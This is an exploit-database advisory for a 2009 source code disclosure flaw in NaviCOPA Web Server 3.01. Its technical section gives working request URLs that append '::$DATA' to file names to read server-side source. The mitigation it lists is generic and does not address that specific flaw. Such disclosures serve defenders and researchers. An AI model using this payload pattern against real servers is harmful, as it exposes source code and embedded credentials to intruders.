NaviCOPA Web Server 3.01 Remote Source Code Disclosure

vendor:

NaviCOPA Web Server

by:

Dr_IDE

7.5

CVSS

HIGH

Source Code Disclosure

200

CWE

Product Name: NaviCOPA Web Server

Affected Version From: 03.01

Affected Version To: 03.01

Patch Exists: NO

Related CWE: N/A

CPE: a:intervations:navicopa_web_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XPSP3

2009

NaviCOPA Web Server 3.01 Remote Source Code Disclosure

NaviCOPA Web Server 3.01 is a Windows based HTTP server. This is the latest version of the application available. NaviCOPA is vulnerable to remote arbitrary source code disclosure by the following means. http://[ webserver IP]/[ file ][::$DATA] http://172.16.2.101/index.html::$DATA http://172.16.2.101/default.asp::$DATA http://172.16.2.101/index.php::$DATA

Mitigation:

Ensure that the web server is configured to only serve files from the intended directory and that the web server is not configured to serve files from any other directory.

Source

Exploit-DB raw data:

#################################################################################
#
# NaviCOPA Web Server 3.01 Remote Source Code Disclosure
# Found By:		Dr_IDE
# Tested On:	Windows XPSP3
#
#################################################################################

- Description -

NaviCOPA Web Server 3.01 is a Windows based HTTP server. This is the latest version of
the application available. 

NaviCOPA is vulnerable to remote arbitrary source code disclosure by the following means.

- Technical Details -

	http://[ webserver IP]/[ file ][::$DATA]
	
	http://172.16.2.101/index.html::$DATA

	http://172.16.2.101/default.asp::$DATA

	http://172.16.2.101/index.php::$DATA

# milw0rm.com [2009-09-16]